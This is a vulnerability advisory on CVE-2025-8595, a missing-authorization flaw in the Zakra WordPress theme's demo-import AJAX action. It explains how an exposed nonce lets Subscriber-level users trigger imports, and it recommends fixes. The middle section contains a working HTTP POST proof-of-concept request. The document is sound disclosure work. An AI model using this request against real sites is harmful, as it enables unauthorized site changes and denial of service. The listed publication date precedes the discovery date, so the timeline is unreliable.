The Zakra WordPress theme, installed on over 50,000 websites, provides a one-click demo import feature that streamlines site setup by loading predefined layouts, widgets, and content. However, a critical vulnerability—CVE-2025-8595—allows even low-privileged Subscriber+ users to invoke the demo import process via the import_button AJAX action. By exploiting a publicly exposed nonce, attackers can import arbitrary demo content, modify site configuration, or trigger long-running operations, thereby disrupting the site or preparing for further privilege escalations.
| CVE | CVE-2025-8595 |
| Plugin Version | Zakra <= 4.1.5 |
| Critical | High |
| All Time | 2 883 377 |
| Active installations | 50 000+ |
| Publicly Published | May 30, 2025 |
| Last Updated | May 30, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8595 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/zakra/zakra-415-missing-authorization-to-subscriber-demo-import |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| July 25, 2025 | Plugin testing and vulnerability detection in the Zakra have been completed |
| July 25, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 13, 2025 | Registered CVE-2025-8595 |
Discovery of the Vulnerability
During a security audit of Zakra’s admin scripts (zakra/inc/admin/class-zakra-admin.php), researchers noted that the zakra_demo_import_nonce—intended to protect the demo import action—was localized to all users via wp_localize_script. Because Subscriber+ users can view scripts enqueued on the Theme Install and Profile pages, they automatically receive a valid nonce. Crucially, the import_button AJAX endpoint checks only this nonce (securityparameter) without verifying the user’s capabilities. This missing authorization check allows any user with access to the profile screen to execute the import function.
Understanding of Missing Authorization attack’s
WordPress security relies on two fundamental checks for sensitive operations: nonce validation (to prevent CSRF) and capability checks (to ensure the user has permission). Plugins or themes that enforce only nonces but skip current_user_can() are vulnerable to low-privilege abuse once the nonce is exposed. Similar flaws have been found in other themes and plugins where an exposed nonce allows guest or subscriber roles to perform actions like changing settings, installing plugins, or exporting data. CVE-2025-8595 follows this pattern, with the nonce reveal effectively bypassing the intended access control.
Exploiting the Missing Authorization Vulnerability
To exploit CVE-2025-8595, an attacker with Subscriber+ user Cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/theme-install.php?theme=zakra Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Origin: http://127.0.0.1 Connection: keep-alive Cookie: Cookie_Of_User_Subscriber+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 action=import_button&security=NONCE_FROM_zakra-plugin-install-helper-js_in_http://127.0.0.1/wordpress/wp-admin/profile.php____
Unauthorized demo imports can wreak havoc on a live site. In a corporate environment, an attacker could upload demos containing malicious shortcodes or hidden scripts. On eCommerce sites, product catalogs and checkout flows might be reset, causing revenue loss. In multisite setups, a subscriber-triggered import could propagate across network sites, amplifying the damage. Furthermore, the long-running import process can exhaust server resources, resulting in Denial-of-Service conditions. Combined with other vulnerabilities, this missing authorization paves the way for full site takeover.
Recommendations for Improved Security
To remediate CVE-2025-8595 and prevent similar issues:
Educate Users: Advise site owners to review user roles and limit Subscriber+ permissions if theme customization is not required.
Enforce Capability Checks: Modify the import_button handler to include current_user_can( 'manage_options' ) or an equivalent capability, ensuring only administrators can trigger demo imports.
Limit Nonce Exposure: Localize sensitive nonces only to admin-only scripts or enqueue them conditionally based on user capabilities.
Harden AJAX Handlers: Audit all AJAX actions for both nonce and capability checks, following WordPress security best practices.
Implement Logging & Alerts: Record demo import events and alert administrators when imports occur, facilitating rapid detection of unauthorized usage.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8595 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuthorization #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.